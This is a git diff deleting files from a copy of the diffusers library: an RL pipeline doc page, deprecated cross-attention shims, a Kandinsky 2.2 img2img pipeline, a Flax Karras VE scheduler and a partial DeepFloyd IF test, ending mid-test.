-🧪 This is an experimental pipeline for reinforcement learning! - - - -This pipeline is based on the [Planning with Diffusion for Flexible Behavior Synthesis](https://huggingface.co/papers/2205.09991) paper by Michael Janner, Yilun Du, Joshua B. Tenenbaum, Sergey Levine. 
- -The abstract from the paper is: - -*Model-based reinforcement learning methods often use learning only for the purpose of estimating an approximate dynamics model, offloading the rest of the decision-making work to classical trajectory optimizers. While conceptually simple, this combination has a number of empirical shortcomings, suggesting that learned models may not be well-suited to standard trajectory optimization. In this paper, we consider what it would look like to fold as much of the trajectory optimization pipeline as possible into the modeling problem, such that sampling from the model and planning with it become nearly identical. The core of our technical approach lies in a diffusion probabilistic model that plans by iteratively denoising trajectories. We show how classifier-guided sampling and image inpainting can be reinterpreted as coherent planning strategies, explore the unusual and useful properties of diffusion-based planning methods, and demonstrate the effectiveness of our framework in control settings that emphasize long-horizon decision-making and test-time flexibility*. - -You can find additional information about the model on the [project page](https://diffusion-planning.github.io/), the [original codebase](https://github.com/jannerm/diffuser), or try it out in a demo [notebook](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/reinforcement_learning_with_diffusers.ipynb). - -The script to run the model is available [here](https://github.com/huggingface/diffusers/tree/main/examples/reinforcement_learning). 
- -## ValueGuidedRLPipeline -[[autodoc]] diffusers.experimental.ValueGuidedRLPipeline \ No newline at end of file diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/models/cross_attention.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/models/cross_attention.py deleted file mode 100644 index 44bc156b34cfa8536bdac0fee34709dfd66ae488..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/models/cross_attention.py +++ /dev/null @@ -1,94 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from ..utils import deprecate -from .attention_processor import ( # noqa: F401 - Attention, - AttentionProcessor, - AttnAddedKVProcessor, - AttnProcessor2_0, - LoRAAttnProcessor, - LoRALinearLayer, - LoRAXFormersAttnProcessor, - SlicedAttnAddedKVProcessor, - SlicedAttnProcessor, - XFormersAttnProcessor, -) -from .attention_processor import AttnProcessor as AttnProcessorRename # noqa: F401 - - -deprecate( - "cross_attention", - "0.20.0", - "Importing from cross_attention is deprecated. Please import from diffusers.models.attention_processor instead.", - standard_warn=False, -) - - -AttnProcessor = AttentionProcessor - - -class CrossAttention(Attention): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. 
Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class CrossAttnProcessor(AttnProcessorRename): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class LoRACrossAttnProcessor(LoRAAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class CrossAttnAddedKVProcessor(AttnAddedKVProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class XFormersCrossAttnProcessor(XFormersAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." 
- deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class LoRAXFormersCrossAttnProcessor(LoRAXFormersAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class SlicedCrossAttnProcessor(SlicedAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class SlicedCrossAttnAddedKVProcessor(SlicedAttnAddedKVProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." 
- deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/kandinsky2_2/pipeline_kandinsky2_2_img2img.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/kandinsky2_2/pipeline_kandinsky2_2_img2img.py deleted file mode 100644 index dba50312e8d76cf6b368e9161b4a2c24492cafcd..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/kandinsky2_2/pipeline_kandinsky2_2_img2img.py +++ /dev/null @@ -1,373 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
- -from typing import Callable, List, Optional, Union - -import numpy as np -import PIL -import torch -from PIL import Image - -from ...models import UNet2DConditionModel, VQModel -from ...schedulers import DDPMScheduler -from ...utils import ( - is_accelerate_available, - is_accelerate_version, - logging, - randn_tensor, - replace_example_docstring, -) -from ..pipeline_utils import DiffusionPipeline, ImagePipelineOutput - - -logger = logging.get_logger(__name__) # pylint: disable=invalid-name - -EXAMPLE_DOC_STRING = """ - Examples: - ```py - >>> from diffusers import KandinskyV22Img2ImgPipeline, KandinskyV22PriorPipeline - >>> from diffusers.utils import load_image - >>> import torch - - >>> pipe_prior = KandinskyV22PriorPipeline.from_pretrained( - ... "kandinsky-community/kandinsky-2-2-prior", torch_dtype=torch.float16 - ... ) - >>> pipe_prior.to("cuda") - - >>> prompt = "A red cartoon frog, 4k" - >>> image_emb, zero_image_emb = pipe_prior(prompt, return_dict=False) - - >>> pipe = KandinskyV22Img2ImgPipeline.from_pretrained( - ... "kandinsky-community/kandinsky-2-2-decoder", torch_dtype=torch.float16 - ... ) - >>> pipe.to("cuda") - - >>> init_image = load_image( - ... "https://huggingface.co/datasets/hf-internal-testing/diffusers-images/resolve/main" - ... "/kandinsky/frog.png" - ... ) - - >>> image = pipe( - ... image=init_image, - ... image_embeds=image_emb, - ... negative_image_embeds=zero_image_emb, - ... height=768, - ... width=768, - ... num_inference_steps=100, - ... strength=0.2, - ... 
).images - - >>> image[0].save("red_frog.png") - ``` -""" - - -# Copied from diffusers.pipelines.kandinsky2_2.pipeline_kandinsky2_2.downscale_height_and_width -def downscale_height_and_width(height, width, scale_factor=8): - new_height = height // scale_factor**2 - if height % scale_factor**2 != 0: - new_height += 1 - new_width = width // scale_factor**2 - if width % scale_factor**2 != 0: - new_width += 1 - return new_height * scale_factor, new_width * scale_factor - - -# Copied from diffusers.pipelines.kandinsky.pipeline_kandinsky_img2img.prepare_image -def prepare_image(pil_image, w=512, h=512): - pil_image = pil_image.resize((w, h), resample=Image.BICUBIC, reducing_gap=1) - arr = np.array(pil_image.convert("RGB")) - arr = arr.astype(np.float32) / 127.5 - 1 - arr = np.transpose(arr, [2, 0, 1]) - image = torch.from_numpy(arr).unsqueeze(0) - return image - - -class KandinskyV22Img2ImgPipeline(DiffusionPipeline): - """ - Pipeline for image-to-image generation using Kandinsky - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods the - library implements for all the pipelines (such as downloading or saving, running on a particular device, etc.) - - Args: - scheduler ([`DDIMScheduler`]): - A scheduler to be used in combination with `unet` to generate image latents. - unet ([`UNet2DConditionModel`]): - Conditional U-Net architecture to denoise the image embedding. - movq ([`VQModel`]): - MoVQ Decoder to generate the image from the latents. 
- """ - - def __init__( - self, - unet: UNet2DConditionModel, - scheduler: DDPMScheduler, - movq: VQModel, - ): - super().__init__() - - self.register_modules( - unet=unet, - scheduler=scheduler, - movq=movq, - ) - self.movq_scale_factor = 2 ** (len(self.movq.config.block_out_channels) - 1) - - # Copied from diffusers.pipelines.kandinsky.pipeline_kandinsky_img2img.KandinskyImg2ImgPipeline.get_timesteps - def get_timesteps(self, num_inference_steps, strength, device): - # get the original timestep using init_timestep - init_timestep = min(int(num_inference_steps * strength), num_inference_steps) - - t_start = max(num_inference_steps - init_timestep, 0) - timesteps = self.scheduler.timesteps[t_start:] - - return timesteps, num_inference_steps - t_start - - def prepare_latents(self, image, timestep, batch_size, num_images_per_prompt, dtype, device, generator=None): - if not isinstance(image, (torch.Tensor, PIL.Image.Image, list)): - raise ValueError( - f"`image` has to be of type `torch.Tensor`, `PIL.Image.Image` or list but is {type(image)}" - ) - - image = image.to(device=device, dtype=dtype) - - batch_size = batch_size * num_images_per_prompt - - if image.shape[1] == 4: - init_latents = image - - else: - if isinstance(generator, list) and len(generator) != batch_size: - raise ValueError( - f"You have passed a list of generators of length {len(generator)}, but requested an effective batch" - f" size of {batch_size}. Make sure the batch size matches the length of the generators." 
- ) - - elif isinstance(generator, list): - init_latents = [ - self.movq.encode(image[i : i + 1]).latent_dist.sample(generator[i]) for i in range(batch_size) - ] - init_latents = torch.cat(init_latents, dim=0) - else: - init_latents = self.movq.encode(image).latent_dist.sample(generator) - - init_latents = self.movq.config.scaling_factor * init_latents - - init_latents = torch.cat([init_latents], dim=0) - - shape = init_latents.shape - noise = randn_tensor(shape, generator=generator, device=device, dtype=dtype) - - # get latents - init_latents = self.scheduler.add_noise(init_latents, noise, timestep) - - latents = init_latents - - return latents - - # Copied from diffusers.pipelines.kandinsky2_2.pipeline_kandinsky2_2.KandinskyV22Pipeline.enable_model_cpu_offload - def enable_model_cpu_offload(self, gpu_id=0): - r""" - Offloads all models to CPU using accelerate, reducing memory usage with a low impact on performance. Compared - to `enable_sequential_cpu_offload`, this method moves one whole model at a time to the GPU when its `forward` - method is called, and the model remains in GPU until the next model runs. Memory savings are lower than with - `enable_sequential_cpu_offload`, but performance is much better due to the iterative execution of the `unet`. - """ - if is_accelerate_available() and is_accelerate_version(">=", "0.17.0.dev0"): - from accelerate import cpu_offload_with_hook - else: - raise ImportError("`enable_model_cpu_offload` requires `accelerate v0.17.0` or higher.") - - device = torch.device(f"cuda:{gpu_id}") - - if self.device.type != "cpu": - self.to("cpu", silence_dtype_warnings=True) - torch.cuda.empty_cache() # otherwise we don't see the memory savings (but they probably exist) - - hook = None - for cpu_offloaded_model in [self.unet, self.movq]: - _, hook = cpu_offload_with_hook(cpu_offloaded_model, device, prev_module_hook=hook) - - # We'll offload the last model manually. 
-        self.final_offload_hook = hook
-
-    @torch.no_grad()
-    @replace_example_docstring(EXAMPLE_DOC_STRING)
-    def __call__(
-        self,
-        image_embeds: Union[torch.FloatTensor, List[torch.FloatTensor]],
-        image: Union[torch.FloatTensor, PIL.Image.Image, List[torch.FloatTensor], List[PIL.Image.Image]],
-        negative_image_embeds: Union[torch.FloatTensor, List[torch.FloatTensor]],
-        height: int = 512,
-        width: int = 512,
-        num_inference_steps: int = 100,
-        guidance_scale: float = 4.0,
-        strength: float = 0.3,
-        num_images_per_prompt: int = 1,
-        generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,
-        output_type: Optional[str] = "pil",
-        callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,
-        callback_steps: int = 1,
-        return_dict: bool = True,
-    ):
-        """
-        Function invoked when calling the pipeline for generation.
-
-        Args:
-            image_embeds (`torch.FloatTensor` or `List[torch.FloatTensor]`):
-                The CLIP image embeddings for the text prompt, which will be used to condition the image generation.
-            image (`torch.FloatTensor`, `PIL.Image.Image`, `np.ndarray`, `List[torch.FloatTensor]`, `List[PIL.Image.Image]`, or `List[np.ndarray]`):
-                `Image`, or tensor representing an image batch, that will be used as the starting point for the
-                process. Can also accept image latents as `image`; if latents are passed directly, they will not be
-                encoded again.
-            strength (`float`, *optional*, defaults to 0.3):
-                Conceptually, indicates how much to transform the reference `image`. Must be between 0 and 1. `image`
-                will be used as a starting point, adding more noise to it the larger the `strength`. The number of
-                denoising steps depends on the amount of noise initially added. When `strength` is 1, added noise will
-                be maximum and the denoising process will run for the full number of iterations specified in
-                `num_inference_steps`. A value of 1, therefore, essentially ignores `image`.
-            negative_image_embeds (`torch.FloatTensor` or `List[torch.FloatTensor]`):
-                The CLIP image embeddings for the negative text prompt; they will be used to condition the image
-                generation.
-            height (`int`, *optional*, defaults to 512):
-                The height in pixels of the generated image.
-            width (`int`, *optional*, defaults to 512):
-                The width in pixels of the generated image.
-            num_inference_steps (`int`, *optional*, defaults to 100):
-                The number of denoising steps. More denoising steps usually lead to a higher quality image at the
-                expense of slower inference.
-            guidance_scale (`float`, *optional*, defaults to 4.0):
-                Guidance scale as defined in [Classifier-Free Diffusion Guidance](https://arxiv.org/abs/2207.12598).
-                `guidance_scale` is defined as `w` of equation 2. of [Imagen
-                Paper](https://arxiv.org/pdf/2205.11487.pdf). Guidance scale is enabled by setting `guidance_scale >
-                1`. A higher guidance scale encourages generating images that are closely linked to the text `prompt`,
-                usually at the expense of lower image quality.
-            num_images_per_prompt (`int`, *optional*, defaults to 1):
-                The number of images to generate per prompt.
-            generator (`torch.Generator` or `List[torch.Generator]`, *optional*):
-                One or a list of [torch generator(s)](https://pytorch.org/docs/stable/generated/torch.Generator.html)
-                to make generation deterministic.
-            output_type (`str`, *optional*, defaults to `"pil"`):
-                The output format of the generated image. Choose between: `"pil"` (`PIL.Image.Image`), `"np"`
-                (`np.array`) or `"pt"` (`torch.Tensor`).
-            callback (`Callable`, *optional*):
-                A function that is called every `callback_steps` steps during inference. The function is called with
-                the following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`.
-            callback_steps (`int`, *optional*, defaults to 1):
-                The frequency at which the `callback` function is called. If not specified, the callback is called at
-                every step.
- return_dict (`bool`, *optional*, defaults to `True`): - Whether or not to return a [`~pipelines.ImagePipelineOutput`] instead of a plain tuple. - - Examples: - - Returns: - [`~pipelines.ImagePipelineOutput`] or `tuple` - """ - device = self._execution_device - - do_classifier_free_guidance = guidance_scale > 1.0 - - if isinstance(image_embeds, list): - image_embeds = torch.cat(image_embeds, dim=0) - batch_size = image_embeds.shape[0] - if isinstance(negative_image_embeds, list): - negative_image_embeds = torch.cat(negative_image_embeds, dim=0) - - if do_classifier_free_guidance: - image_embeds = image_embeds.repeat_interleave(num_images_per_prompt, dim=0) - negative_image_embeds = negative_image_embeds.repeat_interleave(num_images_per_prompt, dim=0) - - image_embeds = torch.cat([negative_image_embeds, image_embeds], dim=0).to( - dtype=self.unet.dtype, device=device - ) - - if not isinstance(image, list): - image = [image] - if not all(isinstance(i, (PIL.Image.Image, torch.Tensor)) for i in image): - raise ValueError( - f"Input is in incorrect format: {[type(i) for i in image]}. 
Currently, we only support PIL image and pytorch tensor" - ) - - image = torch.cat([prepare_image(i, width, height) for i in image], dim=0) - image = image.to(dtype=image_embeds.dtype, device=device) - - latents = self.movq.encode(image)["latents"] - latents = latents.repeat_interleave(num_images_per_prompt, dim=0) - self.scheduler.set_timesteps(num_inference_steps, device=device) - timesteps, num_inference_steps = self.get_timesteps(num_inference_steps, strength, device) - latent_timestep = timesteps[:1].repeat(batch_size * num_images_per_prompt) - height, width = downscale_height_and_width(height, width, self.movq_scale_factor) - latents = self.prepare_latents( - latents, latent_timestep, batch_size, num_images_per_prompt, image_embeds.dtype, device, generator - ) - for i, t in enumerate(self.progress_bar(timesteps)): - # expand the latents if we are doing classifier free guidance - latent_model_input = torch.cat([latents] * 2) if do_classifier_free_guidance else latents - - added_cond_kwargs = {"image_embeds": image_embeds} - noise_pred = self.unet( - sample=latent_model_input, - timestep=t, - encoder_hidden_states=None, - added_cond_kwargs=added_cond_kwargs, - return_dict=False, - )[0] - - if do_classifier_free_guidance: - noise_pred, variance_pred = noise_pred.split(latents.shape[1], dim=1) - noise_pred_uncond, noise_pred_text = noise_pred.chunk(2) - _, variance_pred_text = variance_pred.chunk(2) - noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond) - noise_pred = torch.cat([noise_pred, variance_pred_text], dim=1) - - if not ( - hasattr(self.scheduler.config, "variance_type") - and self.scheduler.config.variance_type in ["learned", "learned_range"] - ): - noise_pred, _ = noise_pred.split(latents.shape[1], dim=1) - - # compute the previous noisy sample x_t -> x_t-1 - latents = self.scheduler.step( - noise_pred, - t, - latents, - generator=generator, - )[0] - - if callback is not None and i % callback_steps == 0: - callback(i, 
t, latents)
-
-        # post-processing
-        image = self.movq.decode(latents, force_not_quantize=True)["sample"]
-
-        # Offload last model to CPU
-        if hasattr(self, "final_offload_hook") and self.final_offload_hook is not None:
-            self.final_offload_hook.offload()
-
-        if output_type not in ["pt", "np", "pil"]:
-            raise ValueError(f"Only the output types `pt`, `pil` and `np` are supported, not output_type={output_type}")
-
-        if output_type in ["np", "pil"]:
-            image = image * 0.5 + 0.5
-            image = image.clamp(0, 1)
-            image = image.cpu().permute(0, 2, 3, 1).float().numpy()
-
-        if output_type == "pil":
-            image = self.numpy_to_pil(image)
-
-        if not return_dict:
-            return (image,)
-
-        return ImagePipelineOutput(images=image)
diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/schedulers/scheduling_karras_ve_flax.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/schedulers/scheduling_karras_ve_flax.py
deleted file mode 100644
index 45c0dbddf7efd22df21cc9859e68d62b54aa8609..0000000000000000000000000000000000000000
--- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/schedulers/scheduling_karras_ve_flax.py
+++ /dev/null
@@ -1,237 +0,0 @@
-# Copyright 2023 NVIDIA and The HuggingFace Team. All rights reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
- - -from dataclasses import dataclass -from typing import Optional, Tuple, Union - -import flax -import jax.numpy as jnp -from jax import random - -from ..configuration_utils import ConfigMixin, register_to_config -from ..utils import BaseOutput -from .scheduling_utils_flax import FlaxSchedulerMixin - - -@flax.struct.dataclass -class KarrasVeSchedulerState: - # setable values - num_inference_steps: Optional[int] = None - timesteps: Optional[jnp.ndarray] = None - schedule: Optional[jnp.ndarray] = None # sigma(t_i) - - @classmethod - def create(cls): - return cls() - - -@dataclass -class FlaxKarrasVeOutput(BaseOutput): - """ - Output class for the scheduler's step function output. - - Args: - prev_sample (`jnp.ndarray` of shape `(batch_size, num_channels, height, width)` for images): - Computed sample (x_{t-1}) of previous timestep. `prev_sample` should be used as next model input in the - denoising loop. - derivative (`jnp.ndarray` of shape `(batch_size, num_channels, height, width)` for images): - Derivative of predicted original image sample (x_0). - state (`KarrasVeSchedulerState`): the `FlaxKarrasVeScheduler` state data class. - """ - - prev_sample: jnp.ndarray - derivative: jnp.ndarray - state: KarrasVeSchedulerState - - -class FlaxKarrasVeScheduler(FlaxSchedulerMixin, ConfigMixin): - """ - Stochastic sampling from Karras et al. [1] tailored to the Variance-Expanding (VE) models [2]. Use Algorithm 2 and - the VE column of Table 1 from [1] for reference. - - [1] Karras, Tero, et al. "Elucidating the Design Space of Diffusion-Based Generative Models." - https://arxiv.org/abs/2206.00364 [2] Song, Yang, et al. "Score-based generative modeling through stochastic - differential equations." https://arxiv.org/abs/2011.13456 - - [`~ConfigMixin`] takes care of storing all config attributes that are passed in the scheduler's `__init__` - function, such as `num_train_timesteps`. They can be accessed via `scheduler.config.num_train_timesteps`. 
- [`SchedulerMixin`] provides general loading and saving functionality via the [`SchedulerMixin.save_pretrained`] and - [`~SchedulerMixin.from_pretrained`] functions. - - For more details on the parameters, see the original paper's Appendix E.: "Elucidating the Design Space of - Diffusion-Based Generative Models." https://arxiv.org/abs/2206.00364. The grid search values used to find the - optimal {s_noise, s_churn, s_min, s_max} for a specific model are described in Table 5 of the paper. - - Args: - sigma_min (`float`): minimum noise magnitude - sigma_max (`float`): maximum noise magnitude - s_noise (`float`): the amount of additional noise to counteract loss of detail during sampling. - A reasonable range is [1.000, 1.011]. - s_churn (`float`): the parameter controlling the overall amount of stochasticity. - A reasonable range is [0, 100]. - s_min (`float`): the start value of the sigma range where we add noise (enable stochasticity). - A reasonable range is [0, 10]. - s_max (`float`): the end value of the sigma range where we add noise. - A reasonable range is [0.2, 80]. - """ - - @property - def has_state(self): - return True - - @register_to_config - def __init__( - self, - sigma_min: float = 0.02, - sigma_max: float = 100, - s_noise: float = 1.007, - s_churn: float = 80, - s_min: float = 0.05, - s_max: float = 50, - ): - pass - - def create_state(self): - return KarrasVeSchedulerState.create() - - def set_timesteps( - self, state: KarrasVeSchedulerState, num_inference_steps: int, shape: Tuple = () - ) -> KarrasVeSchedulerState: - """ - Sets the continuous timesteps used for the diffusion chain. Supporting function to be run before inference. - - Args: - state (`KarrasVeSchedulerState`): - the `FlaxKarrasVeScheduler` state data class. - num_inference_steps (`int`): - the number of diffusion steps used when generating samples with a pre-trained model. 
- - """ - timesteps = jnp.arange(0, num_inference_steps)[::-1].copy() - schedule = [ - ( - self.config.sigma_max**2 - * (self.config.sigma_min**2 / self.config.sigma_max**2) ** (i / (num_inference_steps - 1)) - ) - for i in timesteps - ] - - return state.replace( - num_inference_steps=num_inference_steps, - schedule=jnp.array(schedule, dtype=jnp.float32), - timesteps=timesteps, - ) - - def add_noise_to_input( - self, - state: KarrasVeSchedulerState, - sample: jnp.ndarray, - sigma: float, - key: random.KeyArray, - ) -> Tuple[jnp.ndarray, float]: - """ - Explicit Langevin-like "churn" step of adding noise to the sample according to a factor gamma_i ≥ 0 to reach a - higher noise level sigma_hat = sigma_i + gamma_i*sigma_i. - - TODO Args: - """ - if self.config.s_min <= sigma <= self.config.s_max: - gamma = min(self.config.s_churn / state.num_inference_steps, 2**0.5 - 1) - else: - gamma = 0 - - # sample eps ~ N(0, S_noise^2 * I) - key = random.split(key, num=1) - eps = self.config.s_noise * random.normal(key=key, shape=sample.shape) - sigma_hat = sigma + gamma * sigma - sample_hat = sample + ((sigma_hat**2 - sigma**2) ** 0.5 * eps) - - return sample_hat, sigma_hat - - def step( - self, - state: KarrasVeSchedulerState, - model_output: jnp.ndarray, - sigma_hat: float, - sigma_prev: float, - sample_hat: jnp.ndarray, - return_dict: bool = True, - ) -> Union[FlaxKarrasVeOutput, Tuple]: - """ - Predict the sample at the previous timestep by reversing the SDE. Core function to propagate the diffusion - process from the learned model outputs (most often the predicted noise). - - Args: - state (`KarrasVeSchedulerState`): the `FlaxKarrasVeScheduler` state data class. - model_output (`torch.FloatTensor` or `np.ndarray`): direct output from learned diffusion model. 
- sigma_hat (`float`): TODO - sigma_prev (`float`): TODO - sample_hat (`torch.FloatTensor` or `np.ndarray`): TODO - return_dict (`bool`): option for returning tuple rather than FlaxKarrasVeOutput class - - Returns: - [`~schedulers.scheduling_karras_ve_flax.FlaxKarrasVeOutput`] or `tuple`: Updated sample in the diffusion - chain and derivative. [`~schedulers.scheduling_karras_ve_flax.FlaxKarrasVeOutput`] if `return_dict` is - True, otherwise a `tuple`. When returning a tuple, the first element is the sample tensor. - """ - - pred_original_sample = sample_hat + sigma_hat * model_output - derivative = (sample_hat - pred_original_sample) / sigma_hat - sample_prev = sample_hat + (sigma_prev - sigma_hat) * derivative - - if not return_dict: - return (sample_prev, derivative, state) - - return FlaxKarrasVeOutput(prev_sample=sample_prev, derivative=derivative, state=state) - - def step_correct( - self, - state: KarrasVeSchedulerState, - model_output: jnp.ndarray, - sigma_hat: float, - sigma_prev: float, - sample_hat: jnp.ndarray, - sample_prev: jnp.ndarray, - derivative: jnp.ndarray, - return_dict: bool = True, - ) -> Union[FlaxKarrasVeOutput, Tuple]: - """ - Correct the predicted sample based on the output model_output of the network. TODO complete description - - Args: - state (`KarrasVeSchedulerState`): the `FlaxKarrasVeScheduler` state data class. - model_output (`torch.FloatTensor` or `np.ndarray`): direct output from learned diffusion model. - sigma_hat (`float`): TODO - sigma_prev (`float`): TODO - sample_hat (`torch.FloatTensor` or `np.ndarray`): TODO - sample_prev (`torch.FloatTensor` or `np.ndarray`): TODO - derivative (`torch.FloatTensor` or `np.ndarray`): TODO - return_dict (`bool`): option for returning tuple rather than FlaxKarrasVeOutput class - - Returns: - prev_sample (TODO): updated sample in the diffusion chain. 
derivative (TODO): TODO - - """ - pred_original_sample = sample_prev + sigma_prev * model_output - derivative_corr = (sample_prev - pred_original_sample) / sigma_prev - sample_prev = sample_hat + (sigma_prev - sigma_hat) * (0.5 * derivative + 0.5 * derivative_corr) - - if not return_dict: - return (sample_prev, derivative, state) - - return FlaxKarrasVeOutput(prev_sample=sample_prev, derivative=derivative, state=state) - - def add_noise(self, state: KarrasVeSchedulerState, original_samples, noise, timesteps): - raise NotImplementedError() diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/pipelines/deepfloyd_if/test_if_inpainting_superresolution.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/pipelines/deepfloyd_if/test_if_inpainting_superresolution.py deleted file mode 100644 index 961a22675f33442270751b04da290992d57ed23a..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/pipelines/deepfloyd_if/test_if_inpainting_superresolution.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -# Copyright 2023 HuggingFace Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
- -import random -import unittest - -import torch - -from diffusers import IFInpaintingSuperResolutionPipeline -from diffusers.utils import floats_tensor -from diffusers.utils.import_utils import is_xformers_available -from diffusers.utils.testing_utils import skip_mps, torch_device - -from ..pipeline_params import ( - TEXT_GUIDED_IMAGE_INPAINTING_BATCH_PARAMS, - TEXT_GUIDED_IMAGE_INPAINTING_PARAMS, -) -from ..test_pipelines_common import PipelineTesterMixin -from . import IFPipelineTesterMixin - - -@skip_mps -class IFInpaintingSuperResolutionPipelineFastTests(PipelineTesterMixin, IFPipelineTesterMixin, unittest.TestCase): - pipeline_class = IFInpaintingSuperResolutionPipeline - params = TEXT_GUIDED_IMAGE_INPAINTING_PARAMS - {"width", "height"} - batch_params = TEXT_GUIDED_IMAGE_INPAINTING_BATCH_PARAMS.union({"original_image"}) - required_optional_params = PipelineTesterMixin.required_optional_params - {"latents"} - - def get_dummy_components(self): - return self._get_superresolution_dummy_components() - - def get_dummy_inputs(self, device, seed=0): - if str(device).startswith("mps"): - generator = torch.manual_seed(seed) - else: - generator = torch.Generator(device=device).manual_seed(seed) - - image = floats_tensor((1, 3, 16, 16), rng=random.Random(seed)).to(device) - original_image = floats_tensor((1, 3, 32, 32), rng=random.Random(seed)).to(device) - mask_image = floats_tensor((1, 3, 32, 32), rng=random.Random(seed)).to(device) - - inputs = { - "prompt": "A painting of a squirrel eating a burger", - "image": image, - "original_image": original_image, - "mask_image": mask_image, - "generator": generator, - "num_inference_steps": 2, - "output_type": "numpy", - } - - return inputs - - @unittest.skipIf( - torch_device != "cuda" or not is_xformers_available(), - reason="XFormers attention is only available with CUDA and `xformers` installed", - ) - def test_xformers_attention_forwardGenerator_pass(self): - 
